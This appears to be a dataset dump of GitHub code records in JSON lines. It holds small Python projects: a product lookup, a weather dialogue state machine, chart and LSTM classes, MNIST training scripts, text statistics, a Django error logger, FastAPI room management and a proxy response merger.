Pressione apenas Enter para sair.\")\n entrada = input().strip()\n if not entrada:\n break\n codigo, descricao, quantidade, preco = entrada.split('#')\n produto = {'codigo': codigo, 'descricao': descricao, 'quantidade': int(quantidade), 'preco': float(preco)}\n produtos.append(produto)\n return produtos\n\ndef buscar_produto(codigo, produtos):\n for produto in produtos:\n if produto['codigo'] == codigo:\n return produto\n return None\n\ndef main():\n produtos = ler_produtos()\n while True:\n codigo = input(\"Digite o código do produto (ou nada para sair): \").strip()\n if not codigo:\n break\n produto = buscar_produto(codigo, produtos)\n if produto is None:\n print(f\"Produto com código {codigo} não encontrado.\")\n else:\n print(f\"Produto Localizado: ('{produto['codigo']}', '{produto['descricao']}', '{produto['quantidade']}', '{produto['preco']:.2f}') \")\n print(\"Obrigado por utilizar nosso sistema!!!\")\n\n\nmain()","repo_name":"siqueirarxd/sistema_de_produtos","sub_path":"sistema_de_produtos.py","file_name":"sistema_de_produtos.py","file_ext":"py","file_size_in_byte":1163,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"73044048721","text":"import sys\nfrom PySide2 import QtCore, QtScxml\n\n# Qt boilerplate (application and event loop setup)\napp = QtCore.QCoreApplication()\nel = QtCore.QEventLoop()\n\n# Load the SCXML file\nsm = QtScxml.QScxmlStateMachine.fromFile('states.scxml')\n\n# Transition to the initial state\nsm.start()\nel.processEvents()\n\n# System prompt\nprint(\"SYS> こちらは天気情報案内システムです\")\n\n# Dictionary mapping states to system utterances\nuttdic = {\"ask_place\": \"地名を言ってください\",\n \"ask_date\": \"日付を言ってください\",\n \"ask_type\": \"情報種別を言ってください\"}\n\n# Get the initial state\ncurrent_state = sm.activeStateNames()[0]\nprint(\"current_state=\", current_state)\n\n# Get and print the system utterance tied to the initial state\nsysutt = uttdic[current_state]\nprint(\"SYS>\", sysutt)\n\n# Process user input\nwhile True:\n text = input(\"> \")\n # Transition states based on the user input\n sm.submitEvent(text)\n el.processEvents()\n \n # Get the state transitioned to\n current_state = sm.activeStateNames()[0]\n print(\"current_state=\", current_state)\n \n # If the new state is tell_info, give the information and exit\n if current_state == \"tell_info\":\n print(\"天気をお伝えします\") \n break\n else:\n # Otherwise, generate the system utterance tied to the new state\n sysutt = uttdic[current_state]\n print(\"SYS>\", sysutt) \n\n# Closing utterance\nprint(\"ご利用ありがとうございました\") \n\n# end of file\n","repo_name":"dsbook/dsbook","sub_path":"weather1.py","file_name":"weather1.py","file_ext":"py","file_size_in_byte":1544,"program_lang":"python","lang":"ja","doc_type":"code","stars":39,"dataset":"github-code","pt":"3"} +{"seq_id":"14222797290","text":"from .base_chart import BaseChart,mpl,plt\nimport numpy as np\nimport pandas as pd \n\nclass BarChart(BaseChart):\n def __init__(self, **kwargs) -> None:\n super().__init__(**kwargs)\n \n \n def draw_ax(self, data, ax,legend = True,**kwargs):\n d = {}\n\n for value in data[\"values\"]:\n d[value[\"option\"][\"label\"]] = value['y']\n df = pd.DataFrame(data=d,index=data[\"x\"])\n if kwargs.get(\"barh\",False):\n ax = df.plot.barh(ax = ax,rot = 0)\n else:\n ax = df.plot.bar(ax = ax,rot = 0)\n\n if kwargs.get(\"anno\",False):\n for bar_group in ax.containers:\n ax.bar_label(bar_group,padding=1,fontsize = kwargs.get(\"fontsize\",10))\n return super().draw_ax(data, ax,legend,**kwargs)\n\n def draw(self, data,figsize = (7,7),legend = True, **kwargs):\n super().draw(data,['visual/style/ieee-bar.mplstyle'],figsize,legend,**kwargs)\n return \n\n\n\n \nif __name__ == \"__main__\":\n import math\n\n data = {\"x\":list(range(10)),\n \"values\":[\n 
{\"y\":list(range(10)),\"option\":{\"linewidth\":2,\"label\":\"test\"}},\n {\"y\":list(range(10)),\"option\":{\"linewidth\":2,\"label\":\"test2\"}}\n ]}\n\n bc = BarChart()\n bc.draw(data)\n bc.save(\"bc_test.png\")","repo_name":"junTangs/visual","sub_path":"bar_chart.py","file_name":"bar_chart.py","file_ext":"py","file_size_in_byte":1311,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"30924154563","text":"import torch\r\nimport torch.nn as nn\r\n\r\nclass BilateralLSTMCell(nn.Module):\r\n\r\n def __init__(self, input_dim, hidden_dim, scope_name): # dimension for input state, hidden state and string identifier for the cell\r\n super(BilateralLSTMCell, self).__init__()\r\n self.input_dim = input_dim\r\n self.hidden_dim = hidden_dim\r\n self.scope_name = scope_name\r\n\r\n # define weight matrices and bias vectors for input gate, forget gate, output gate and the cell state \r\n\r\n #input gate\r\n self.W_i = nn.Linear(input_dim, hidden_dim)\r\n self.U_i = nn.Linear(hidden_dim, hidden_dim, bias=False)\r\n self.V_i = nn.Linear(hidden_dim, hidden_dim, bias=False)\r\n\r\n #forget gate\r\n self.W_f = nn.Linear(input_dim, hidden_dim)\r\n self.U_f = nn.Linear(hidden_dim, hidden_dim, bias=False)\r\n self.V_f = nn.Linear(hidden_dim, hidden_dim, bias=False)\r\n\r\n #output gate\r\n self.W_o = nn.Linear(input_dim, hidden_dim)\r\n self.U_o = nn.Linear(hidden_dim, hidden_dim, bias=False)\r\n self.V_o = nn.Linear(hidden_dim, hidden_dim, bias=False)\r\n\r\n #cell gate\r\n self.W_c = nn.Linear(input_dim, hidden_dim)\r\n self.U_c = nn.Linear(hidden_dim, hidden_dim, bias=False)\r\n self.V_c = nn.Linear(hidden_dim, hidden_dim, bias=False)\r\n\r\n def forward(self, x, hidden_memory_tm1, hidden_memory_tm2): # to compute LSTM cell's output; input, tuple with previous hidden and memory state, two time steps ago\r\n\r\n # Unpack the hidden states and memory from the previous time steps\r\n previous_hidden_state, c_prev = hidden_memory_tm1\r\n previous_hidden_state_, _ = hidden_memory_tm2\r\n\r\n #calculate input gate activation \r\n i = torch.sigmoid(\r\n self.W_i(x) +\r\n self.U_i(previous_hidden_state) +\r\n self.V_i(previous_hidden_state_)\r\n )\r\n\r\n #calculate forget gate activation \r\n f = torch.sigmoid(\r\n self.W_f(x) +\r\n self.U_f(previous_hidden_state) +\r\n self.V_f(previous_hidden_state_)\r\n )\r\n\r\n #calculate output gate activation \r\n o = torch.sigmoid(\r\n self.W_o(x) +\r\n self.U_o(previous_hidden_state) +\r\n self.V_o(previous_hidden_state_)\r\n )\r\n\r\n #calculate new cell state (c_)\r\n c_ = torch.tanh(\r\n self.W_c(x) +\r\n self.U_c(previous_hidden_state) +\r\n self.V_c(previous_hidden_state_)\r\n )\r\n\r\n #update the cell state (c)\r\n c = f * c_prev + i * c_\r\n\r\n #calculate hidden state \r\n h_t = o * torch.tanh(c)\r\n\r\n #return hidden state and updated memory\r\n return h_t, (h_t, c)\r\n\r\nclass MultilayerCells(nn.Module):\r\n\r\n def __init__(self, cells):\r\n super(MultilayerCells, self).__init__()\r\n self.cells = cells # individual LSTM cells making up the multilayer cell \r\n\r\n def forward(self, input, state, state_): #input, list of the previous hidden states+memory states for each individual cell, same for 2 time steps ago \r\n cur_inp = input #current input\r\n new_states = [] #emplty list for new states \r\n\r\n for i, cell in enumerate(self.cells):\r\n with torch.no_grad(): # Disabling gradient computation for efficiency\r\n cur_inp, new_state = cell(x=cur_inp, hidden_memory_tm1=state[i], 
hidden_memory_tm2=state_[i])\r\n                new_states.append(new_state)\r\n\r\n        return cur_inp, new_states","repo_name":"arra131/Thesis","sub_path":"Pytorch code/BilateralLSTM_class.py","file_name":"BilateralLSTM_class.py","file_ext":"py","file_size_in_byte":3505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"9921306992","text":"from lja.managers.training_manager import MnistNetworkTrainingManager\nfrom lja.LT_extractor.extractor import LTExtractor\nimport torch\n\n# 1. Load model\nmanager = MnistNetworkTrainingManager(model_type=\"dropout\")\nmanager.validation_loop()\nnet_device = manager.net.device\n\n\n# 2. Input query\n# select n-samples of each of the 10 different classes\nlabels = manager.test_dataset.targets\nindices = []\nn = 100\nfor i in range(10):\n    index = (labels == i).nonzero(as_tuple=True)[0][0:n]\n    indices += index.tolist()\n\n\n# select input query from test dataset\nx0 = manager.test_dataset.data.reshape(-1, 28 * 28).float()[indices, :]\nx0 = x0.to(net_device)\nlabels = labels[indices]\n\n# 3. Create extractor\nextractor = LTExtractor(manager.net, x0, labels)\n\n# 4. Extract linear transformations\nextractor.extract()\n\n# 5. Store\nextractor.store(\"mnist/dropout/\")\n","repo_name":"leesharkey/layerwise_jacobian_analysis","sub_path":"scripts/mnist_pipeline/2_extract_transformations.py","file_name":"2_extract_transformations.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"43202643352","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[16]:\n\n\nimport tensorflow as tf\n\nmnist=tf.keras.datasets.mnist #28x28 images of written 0-9\n(x_train, y_train),(x_test, y_test)= mnist.load_data() #loading the data in these variables\n\n#normalizing the data - scaling the values between 0 and 1 - makes it easier for python\nx_train = tf.keras.utils.normalize(x_train, axis=1) \nx_test = tf.keras.utils.normalize(x_test, axis=1)\n\n#building the model architecture\nmodel = tf.keras.models.Sequential() #using a sequential model\nmodel.add(tf.keras.layers.Flatten())#our input layer that we have flattened\nmodel.add(tf.keras.layers.Dense(128, activation=tf.nn.relu)) #1st hidden layer - Dense layer with 128 neurons and a relu \nmodel.add(tf.keras.layers.Dense(128, activation=tf.nn.relu)) #2nd hidden layer\nmodel.add(tf.keras.layers.Dense(10, activation=tf.nn.softmax)) #output layer. 10 neurons so that each possible output (0-9) has one. Softmax for probability distribution\n\n#parameters to train the model \nmodel.compile (optimizer=\"adam\", #adam is the go-to. 
Another example is gradient descent.\n               loss=\"sparse_categorical_crossentropy\",#this is the default go-to loss here\n              metrics=[\"accuracy\"]) #what metrics you wanna follow\n#the nn is always trying to minimize loss \n\n#training the model\nmodel.fit(x_train, y_train, epochs=3) #iterates over the dataset 3 times\n\n\n\n# In[17]:\n\n\n#checking if we have overfit or underfit\n#calculating validation loss and validation accuracy\nval_loss, val_acc = model.evaluate(x_test,y_test)\nprint(val_loss, val_acc)\n#loss would be slightly lower and accuracy would be slightly higher for best results\n\n\n# In[20]:\n\n\n#saving a model\nmodel.save(\"epic_num_reader.model\")\n#loading a model\nnew_model = tf.keras.models.load_model(\"epic_num_reader.model\")\n\n\n# In[39]:\n\n\n#making a prediction\npredictions = new_model.predict([x_test])\n\n#predict always takes a list, so the [] is needed\n\n\n# In[48]:\n\n\n#print(predictions) #this gives a list of pixel arrays. We convert it to a number\n\nimport numpy as np\nprint(np.argmax(predictions[2042])) #finds the argument and gives the maximum value, i.e. which class has the highest probability.\n\n\n# In[47]:\n\n\n#checking if the value is true using matplotlib\nimport matplotlib.pyplot as plt\nplt.imshow(x_test[2042]) #displays data as image on a 2D raster\nplt.show()\n\n","repo_name":"sharar-muhtasim/Deep_Learning_Basics","sub_path":"Mnist_Number_Prediction.py","file_name":"Mnist_Number_Prediction.py","file_ext":"py","file_size_in_byte":2287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"24414790435","text":"from collections import Counter\nimport re\nimport os\n\n\ndef open_file(filename):\n\n    if not os.path.exists(filename):\n        return -1\n\n    if not filename.endswith('.txt'):\n        return -2\n\n    if os.stat(filename).st_size == 0:\n        return -3\n\n    else:\n        with open(filename, \"r\", encoding=\"utf-8\") as file:\n            return file.read()\n\n\ndef count_paragraphs(filename):\n    count = 0\n    with open(filename, \"r\", encoding=\"utf-8\") as file:\n        for line in file:\n            if line[:5] == \"     \":\n                count += 1\n\n    return count\n\n\ndef get_words(file):\n    raw_text = re.findall(r'\\w+', file)\n    words = [word.lower() for word in raw_text if word.isalpha()]\n\n    return words\n\n\ndef get_all_letters(words):\n    return ''.join(words).lower()\n\n\ndef word_freq(words, letter):\n    counter = 0\n\n    for word in words:\n        if letter in word:\n            counter += 1\n\n    return counter / len(words)\n\n\ndef letter_stat(letters, words):\n    letter_count = len(letters)\n    stat = dict(Counter(letters))\n\n    for key in stat.keys():\n        letter_freq = stat[key] / letter_count\n        word_proportion = word_freq(words, key)\n\n        stat[key] = (letter_freq, word_proportion)\n\n    return stat\n\n\ndef bilingual_count(words):\n    count = 0\n\n    for word in words:\n        if re.search(r'[a-zA-Z]', word) and re.search(r'[а-яА-Я]', word):\n            count += 1\n\n    return count\n\n\ndef text_stat(filename):\n    file = open_file(filename)\n\n    if file == -1:\n        return {\"error\": \"No such file or directory\"}\n\n    if file == -2:\n        return {\"error\": \"Only .txt files are supported\"}\n\n    if file == -3:\n        return {\"error\": \"File is empty\"}\n\n    else:\n        words = get_words(file)\n        letters = get_all_letters(words)\n\n        stats = letter_stat(letters, words)\n        stats[\"word_amount\"] = len(words)\n        stats[\"paragraph_amount\"] = count_paragraphs(filename)\n        stats[\"bilingual_word_amount\"] = bilingual_count(words)\n\n        return stats\n\n\nfilename = 
\"./data/missing.txt\"\n\nprint(text_stat(filename))\n","repo_name":"CosmonautComrad/swoyo_tasks","sub_path":"text stat/text_stat.py","file_name":"text_stat.py","file_ext":"py","file_size_in_byte":2066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"31829899087","text":"import sys\nimport cv2\nimport os\nfrom sys import platform\nimport argparse\nimport copy\nimport json\n\n# open absolute_coords.json to get the absolute coordinates\nwith open(\"absolute_coords.json\") as json_file:\n data = json.load(json_file)\n\ndict_copy = copy.deepcopy(data)\n\n\ndef mirror(items):\n for item in items:\n x = item[0]\n # formula to calculate how many pixels to move point by -(x-mp)*2\n formula = -(x - half_width) * 2\n item[0] = x + formula\n return items\n\n\n# augment data to be inverted\nfor key in dict_copy.keys():\n augemented_video = dict_copy[key]\n half_width = augemented_video[\"width\"] / 2\n body = augemented_video[\"body\"]\n\n body = mirror(body)\n\n data[key + \"_inverted\"] = augemented_video\n\n# augment data to be scaled\nfor key in dict_copy.keys():\n augemented_video = dict_copy[key]\n\n data[key + \"_scaled\"] = augemented_video\n\nwith open(\"augmented.json\", \"w\") as json_file:\n data = json.dumps(data, indent=True)\n json_file.write(data)\n json_file.write(\"\\n\")\n","repo_name":"KristinaG5/AI-Sign-Language-Translator","sub_path":"research/preprocessing/data_augmentation.py","file_name":"data_augmentation.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"17011361670","text":"import unittest\n\nfrom anomalearn.exceptions import InvalidInputShape\n\n\nclass TestInvalidInputShape(unittest.TestCase):\n def test_raise(self):\n try:\n raise InvalidInputShape((10, 3), tuple([10]))\n except InvalidInputShape as e:\n self.assertIsInstance(e, InvalidInputShape)\n","repo_name":"marcopetri98/anomalearn","sub_path":"tests/anomalearn/exceptions/TestInvalidInputShape.py","file_name":"TestInvalidInputShape.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"3"} +{"seq_id":"38804262172","text":"import re\nimport logging\nimport traceback\n\n\ndb_default_formatter = logging.Formatter()\n\n\nclass DatabaseLogHandler(logging.Handler):\n def log_level(self, levelno):\n logs = {}\n logs[logging.NOTSET] = \"NotSet\"\n logs[logging.INFO] = \"Info\"\n logs[logging.WARNING] = \"Warning\"\n logs[logging.DEBUG] = \"Debug\"\n logs[logging.ERROR] = \"Error\"\n logs[logging.FATAL] = \"Fatal\"\n return logs[levelno]\n\n def emit(self, record):\n from .models import LogError\n\n line = 0\n pathname = record.pathname\n function = \"\"\n \n if hasattr(record, \"exc_info\") and not record.exc_info is None and len(record.exc_info) >= 2:\n trace = db_default_formatter.formatException(record.exc_info)\n trace_parse = traceback.format_tb(record.exc_info[2]).pop()\n result = re.findall(r\".*, line (\\d+), in .*\", trace_parse)\n if len(result) > 0:\n line = int(result[0])\n result = re.findall(r'.* File \"(.*)\", line .*', trace_parse)\n if len(result) > 0:\n pathname = result[0]\n result = re.findall(r\".*, in (.*)\", trace_parse)\n if len(result) > 0:\n function = result[0]\n if hasattr(record, \"request\"):\n kwargs = {\n \"logger_name\": record.name,\n \"level\": self.log_level(record.levelno),\n \"pathname\": pathname,\n \"line\": line,\n \"function\": function,\n 
\"http_method\": record.request.method,\n \"request_url\": record.request.path,\n \"exception_type\": record.exc_info[0].__name__,\n \"exception_value\": str(record.exc_info[1]),\n \"stack_trace\": trace,\n }\n if hasattr(record.request, \"user\") and record.request.user.is_authenticated:\n kwargs[\"user\"] = record.request.user\n else:\n kwargs = {\n \"logger_name\": record.name,\n \"level\": self.log_level(record.levelno),\n \"pathname\": pathname,\n \"line\": line,\n \"function\": function,\n \"exception_type\": record.exc_info[0].__name__,\n \"exception_value\": str(record.exc_info[1]),\n \"stack_trace\": trace,\n }\n LogError.objects.create(**kwargs)\n","repo_name":"null-none/django-log-errors","sub_path":"log_errors/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":2517,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"23271661394","text":"import json\nimport os\nfrom os import getenv\nfrom sqlalchemy.orm import Session\nfrom Database import models\nfrom fastapi import HTTPException, status\nfrom sqlalchemy.sql import text\nfrom datetime import datetime\nimport pytz\nfrom Functions.MemberQuestionsFunctions import deleteSubmittedFile\n\n\ndef createNewRoom(roomName, tokenData, db: Session):\n newRoom = models.Rooms(\n ownerId = tokenData['userId'],\n name = roomName,\n createdAt = datetime.now(pytz.timezone('Asia/Kolkata')),\n specialFields = []\n )\n\n db.add(newRoom)\n db.commit()\n db.refresh(newRoom)\n\n myRooms = getMyRooms(tokenData, db)['myRooms']\n return {\"newRoomId\": newRoom.id, \"myRooms\": myRooms}\n\n\ndef updateRoomSettings(roomInfo, tokenData, db: Session):\n room = db.query(models.Rooms).filter(models.Rooms.id == roomInfo.roomId).first()\n\n if not room:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=f\"Room does not exist.\")\n\n if room.ownerId != tokenData['userId']:\n raise HTTPException(status_code=status.HTTP_406_NOT_ACCEPTABLE, detail=f\"You do not own this room.\")\n\n room.name = roomInfo.roomName\n room.visibility = roomInfo.visibility\n room.waitingRoomEnabled = roomInfo.waitingRoomEnabled\n room.specialFields = roomInfo.specialFields\n\n db.commit()\n db.refresh(room)\n\n if not roomInfo.waitingRoomEnabled:\n members = db.execute(text(f\"\"\"\n SELECT id FROM RoomMembers \n WHERE roomId = {roomInfo.roomId} AND inWaitingRoom = TRUE AND isRejected = FALSE \n \"\"\")).fetchall()\n\n\n for member in members:\n db.execute(text(f\"\"\"\n UPDATE RoomMembers\n SET inWaitingRoom = False\n WHERE id = {member[0]}\n \"\"\"))\n db.commit()\n\n\n roomInfo = {\n \"roomId\": room.id,\n \"roomName\": room.name,\n \"visibility\": room.visibility,\n \"waitingRoomEnabled\": room.waitingRoomEnabled,\n \"enrolled\": getEnrolledCount(roomInfo.roomId, db),\n \"waitingRoomCount\": getWaitingRoomCount(roomInfo.roomId, db)\n }\n myRooms = getMyRooms(tokenData, db)['myRooms']\n\n return {\"roomInfo\": roomInfo, \"myRooms\": myRooms}\n\n\ndef getEnrolledCount(roomId, db: Session):\n return db.execute(text(f\"\"\"\n SELECT COUNT(*) \n FROM RoomMembers \n WHERE roomId = {roomId} AND inWaitingRoom = FALSE AND isRejected = FALSE;\n \"\"\")).fetchone()[0]\n\n\ndef getWaitingRoomCount(roomId, db: Session):\n return db.execute(text(f\"\"\"\n SELECT COUNT(*) \n FROM RoomMembers \n WHERE roomId = {roomId} AND inWaitingRoom = TRUE AND isRejected = FALSE;\n \"\"\")).fetchone()[0]\n\n\ndef getMyRooms(tokenData, db: Session):\n sqlData = db.execute(text(f\"\"\"\n SELECT R.id, R.name, 
R.visibility, COUNT(Q.id) AS questionsCount\n FROM Rooms R\n LEFT JOIN Questions Q on R.id = Q.roomId\n WHERE R.ownerId = {tokenData['userId']}\n GROUP BY R.id\n \"\"\")).fetchall()\n\n myRooms = []\n for row in sqlData:\n # print(row)\n myRooms.append({\n \"roomId\": row[0],\n \"roomName\": row[1],\n \"visibility\": row[2],\n \"questions\": row[3],\n \"enrolled\": getEnrolledCount(row[0], db),\n })\n\n return {\"myRooms\": myRooms}\n\n\ndef getRoomById(roomId, tokenData, db: Session):\n myRoom = db.execute(text(f\"\"\"\n SELECT id, ownerId, name, visibility, waitingRoomEnabled, specialFields\n FROM Rooms\n WHERE id = {roomId}\n \"\"\")).fetchone()\n\n if not myRoom:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=f\"Room not found.\")\n\n if tokenData['userId'] != myRoom[1]: #Index 1 is ownerId\n raise HTTPException(status_code=status.HTTP_406_NOT_ACCEPTABLE, detail=f\"You do not own this room.\")\n\n roomInfo = {\n \"roomId\": myRoom[0],\n \"roomName\": myRoom[2],\n \"visibility\": myRoom[3],\n \"waitingRoomEnabled\": myRoom[4] == 1,\n \"enrolled\": getEnrolledCount(roomId, db),\n \"waitingRoomCount\": getWaitingRoomCount(roomId, db),\n \"specialFields\": json.loads(myRoom[5])\n }\n\n questionData = db.execute(text(f\"\"\"\n SELECT id, title, isVisible, endTime, _type\n FROM Questions Q \n WHERE roomId = {roomId}\n \"\"\")).fetchall()\n\n questions = []\n for question in questionData:\n questions.append({\n \"questionId\": question[0],\n \"title\": question[1],\n \"isVisible\": question[2],\n \"endTime\": question[3],\n \"type\": question[4],\n \"submitted\": db.execute(text(f\"\"\"\n SELECT COUNT(DISTINCT userId) \n FROM CodeSubmissions \n WHERE questionId = {question[0]}\n \"\"\")).fetchone()[0]\n +\n db.execute(text(f\"\"\"\n SELECT COUNT(DISTINCT userId) \n FROM FileSubmissions \n WHERE questionId = {question[0]}\n \"\"\")).fetchone()[0]\n })\n\n return {\"roomInfo\": roomInfo, \"questions\": questions}\n\n\ndef verifyRoomOwner(roomId, tokenData, db: Session):\n room = db.query(models.Rooms).filter(models.Rooms.id == roomId).first()\n\n if not room or room.ownerId != tokenData['userId']:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=f\"Invalid Room.\")\n\n return room\n\n\ndef getRoomMembers(roomId, waiting, db: Session ):\n\n roomMembers = db.execute(text(f\"\"\"\n SELECT U.id, U.username, U.email, U.fname, U.lname, Rm.id, Rm.specialFields\n FROM RoomMembers RM\n LEFT JOIN Users U on U.id = RM.userId\n WHERE RM.roomId = {roomId} AND RM.isRejected = FALSE AND RM.inWaitingRoom = {waiting}\n GROUP BY U.id\n \"\"\")).fetchall()\n\n members = []\n for member in roomMembers:\n members.append({\n \"userId\": member[0],\n \"userName\": member[1],\n \"email\": member[2],\n \"name\": member[3] + \" \" + member[4],\n \"tableId\": member[5],\n \"specialFields\": json.loads(member[6])\n })\n\n return {\"members\": members}\n\n\ndef modifyRoomMember(roomId, userId, reject, db: Session):\n db.execute(text(f\"\"\"\n UPDATE RoomMembers\n SET isRejected = {reject}, inWaitingRoom = FALSE\n WHERE userId = {userId} AND roomId = {roomId}\n \"\"\"))\n db.commit()\n\n return True\n\n\ndef deleteRoom(roomId, db):\n\n questionIds = db.execute(text(f\"\"\"\n SELECT id, _type FROM Questions WHERE roomId={roomId}\n \"\"\")).fetchall()\n\n for id in questionIds:\n if id[1] == \"file\":\n dir = getenv(\"BASE_PATH\") + f\"/SavedFiles/Q_{id[0]}\"\n for f in os.listdir(dir):\n os.remove(os.path.join(dir, f))\n os.removedirs(dir)\n\n db.execute(text(f\"\"\"\n DELETE FROM 
FileSubmissions \n WHERE questionId={id[0]}\n \"\"\"))\n else:\n db.execute(text(f\"\"\"\n DELETE FROM CodeSubmissions\n WHERE questionId = {id[0]}\n \"\"\"))\n db.execute(text(f\"\"\"\n DELETE FROM SavedCodes\n WHERE questionId = {id[0]}\n \"\"\"))\n\n db.execute(text(f\"\"\"\n DELETE FROM RoomMembers\n WHERE roomId={roomId}\n \"\"\"))\n db.execute(text(f\"\"\"\n DELETE FROM Questions\n WHERE roomId={roomId}\n \"\"\"))\n db.execute(text(f\"\"\"\n DELETE FROM Rooms\n WHERE id={roomId}\n \"\"\"))\n\n db.commit()\n return True\n","repo_name":"Shlok-Zanwar/CodeRooms-Backend","sub_path":"Functions/MyRoomsFunctions.py","file_name":"MyRoomsFunctions.py","file_ext":"py","file_size_in_byte":7761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"6001511693","text":"from typing import Callable\n\n\n# Cheap event emitter\nclass Event(dict):\n async def __call__(self, fname, *args, **kwargs):\n if fname == \"*\":\n await self.call_all(*args, **kwargs)\n else:\n f = self.get(fname)\n if callable(f):\n await f(*args, **kwargs)\n\n async def call_all(self, *args, **kwargs):\n for _, f in self.items():\n if callable(f):\n await f(*args, **kwargs)\n\n def add_method(self, func: Callable):\n name = func.__name__\n self.update({name: func})\n\n def remove_method(self, name: str):\n self.pop(name)\n","repo_name":"dino-inc/ainsleybot","sub_path":"utils/events.py","file_name":"events.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"30481372421","text":"\ndef findstr(x1,x2):\n i = 0\n k=x1.find(x2)\n while(k!=-1):\n i += 1\n k=x1.find(x2,k+1)\n return i\n\nstr1 = 'i want to improve python,improve python once time im'\nstr2 = 'im'\n\nprint(findstr(str1,str2))\n\n","repo_name":"ljc520313/PythonDemo","sub_path":"com/example/hanshu1.py","file_name":"hanshu1.py","file_ext":"py","file_size_in_byte":224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"15346977882","text":"# coding=utf-8\r\nfrom seemmo.response.baseProxyResponseHandler import BaseProxyResponseHandler\r\nfrom seemmo.response.responseEntity import ResponseEntity\r\nimport ujson as json\r\nimport logging\r\n\r\n\r\nclass CompareProxyResponseHandler(BaseProxyResponseHandler):\r\n\r\n def __init__(self):\r\n BaseProxyResponseHandler.__init__(self)\r\n self.ignore_error_response = False\r\n\r\n # 1. 如果全部请求都成功,合并结果,返回成功\r\n # 2. 至少有一个请求返回成功,合并结果,返回成功,附带detail\r\n # 2. 所有请求失败(http error或response errorCode!=0),返回失败,附带detail\r\n # 3. 
http status code 恒返回200\r\n def merge_result(self, response_entity_list):\r\n success_entity_list = list()\r\n failed_entity_list = list()\r\n proxy_detail = dict()\r\n request_body = response_entity_list[0].request_body\r\n\r\n try:\r\n for response_entity in response_entity_list:\r\n proxy_detail[response_entity.request_url] = {'httpCode': response_entity.error_code, 'httpMessage': response_entity.error_message, 'body': response_entity.request_body,\r\n 'return_body': response_entity.return_body}\r\n if response_entity.error_code:\r\n failed_entity_list.append(response_entity)\r\n continue\r\n if not response_entity.return_body:\r\n failed_entity_list.append(response_entity)\r\n continue\r\n body = json.loads(response_entity.return_body)\r\n if ('errorCode' not in body) or cmp(str(body['errorCode']), '0') != 0:\r\n failed_entity_list.append(response_entity)\r\n continue\r\n else:\r\n success_entity_list.append(response_entity)\r\n # 全都失败\r\n if not success_entity_list:\r\n body = {'errorCode': 1, 'message': 'error', 'proxy_detail': proxy_detail}\r\n return ResponseEntity.create_success_entity(None, None, body)\r\n # 至少有部分成功,合并结果\r\n success_body = dict()\r\n if not request_body:\r\n body = {'errorCode': 1, 'message': 'got empty post data', 'proxy_detail': proxy_detail}\r\n return ResponseEntity.create_success_entity(None, None, body)\r\n request_body = json.loads(request_body)\r\n if 'sourceDetail' in request_body:\r\n top_n = request_body['sourceDetail']['topN']\r\n else:\r\n top_n = request_body['sourceFaceDetail']['topN']\r\n for success_entity in success_entity_list:\r\n success_body = self.merge_body(success_body, success_entity.return_body, top_n)\r\n # 没有查询结果\r\n if not success_body:\r\n success_body = json.loads(success_entity_list[0].return_body)\r\n\r\n # 部分成功,返回结果+细节\r\n if failed_entity_list and not self.ignore_error_response:\r\n success_body = self.merge_proxy_detail(success_body, proxy_detail)\r\n return ResponseEntity.create_success_entity(None, None, success_body)\r\n # 全部成功,返回结果\r\n else:\r\n return ResponseEntity.create_success_entity(None, None, success_body)\r\n except Exception as e:\r\n logging.exception('fatal error %s' % e.message)\r\n body = {'errorCode': -99, 'message': e.message, 'proxy_detail': proxy_detail}\r\n return ResponseEntity.create_failed_entity(None, None, -99, e.message, body)\r\n\r\n @staticmethod\r\n def merge_body(result_body, body_tobe_merge, top_n):\r\n body_tobe_merge_dict = json.loads(body_tobe_merge)\r\n if not result_body:\r\n if ('data' not in body_tobe_merge_dict) or ('matchResults' not in body_tobe_merge_dict['data']):\r\n return result_body\r\n if (not body_tobe_merge_dict['data']['matchResults']) or ('topIds' not in body_tobe_merge_dict['data']['matchResults'][0]) or (\r\n not body_tobe_merge_dict['data']['matchResults'][0]['topIds']):\r\n return result_body\r\n result_body = body_tobe_merge_dict\r\n else:\r\n merge_match_results = dict()\r\n # 1. no result to merge\r\n if ('data' not in body_tobe_merge_dict) or ('matchResults' not in body_tobe_merge_dict['data']):\r\n return result_body\r\n if (not body_tobe_merge_dict['data']['matchResults']) or ('topIds' not in body_tobe_merge_dict['data']['matchResults'][0]) or (\r\n not body_tobe_merge_dict['data']['matchResults'][0]['topIds']):\r\n return result_body\r\n # 2. 
